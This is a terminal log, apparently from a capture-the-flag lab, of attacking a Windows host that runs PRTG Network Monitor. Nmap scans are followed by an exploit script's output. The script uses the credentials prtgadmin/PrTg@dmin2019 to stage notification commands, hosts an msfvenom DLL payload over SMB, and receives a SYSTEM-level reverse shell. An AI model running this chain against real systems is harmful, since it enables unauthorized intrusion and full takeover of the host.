┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.152 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 23:58 CST Warning: 10.10.10.152 giving up on port because retransmission cap hit (10). Nmap scan report for10.10.10.152 Host is up (0.29s latency). Not shown: 65338 closed tcp ports (reset), 184 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 --min-rate=10000 -sC -sV 10.10.10.152 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 00:04 CST Nmap scan report for10.10.10.152 Host is up (0.50s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-1912:18AM 1024 .rnd | 02-25-1910:15PM <DIR> inetpub | 07-16-1609:18AM <DIR> PerfLogs | 02-25-1910:56PM <DIR> Program Files | 02-03-1912:28AM <DIR> Program Files (x86) | 02-03-1908:08AM <DIR> Users |_11-10-2310:20AM <DIR> Windows 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-server-header: PRTG/18.1.37.13946 |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 88.80 seconds
[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Notification with objid [2018] staged for execution [*] Generate msfvenom payload with [LHOST=10.10.14.45 LPORT=443 OUTPUT=/tmp/tbfvtymv.dll] [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of dll file: 9216 bytes /home/kali/Desktop/exp.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead impacket.setName('Impacket') /home/kali/Desktop/exp.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead impacket.setDaemon(True) [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Hosting payload at [\\10.10.14.45\MMIRDVSR] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Notification with objid [2019] staged for execution [*] Attempting to kill the impacket thread [-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445! [-] ps aux | grep <script name> and kill -9 <pid> if it is still running :) [-] The connection will eventually time out.
[+] Listening on [10.10.14.45:443for the reverse shell!] listening on [any] 443 ... [*] Incoming connection (10.10.10.152,50344) [*] AUTHENTICATE_MESSAGE (\,NETMON) [*] User NETMON\ authenticated successfully [*] :::00::aaaaaaaaaaaaaaaa connect to [10.10.14.45] from (UNKNOWN) [10.10.10.152] 50345 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> C:\Windows\system32>whoami whoami nt authority\system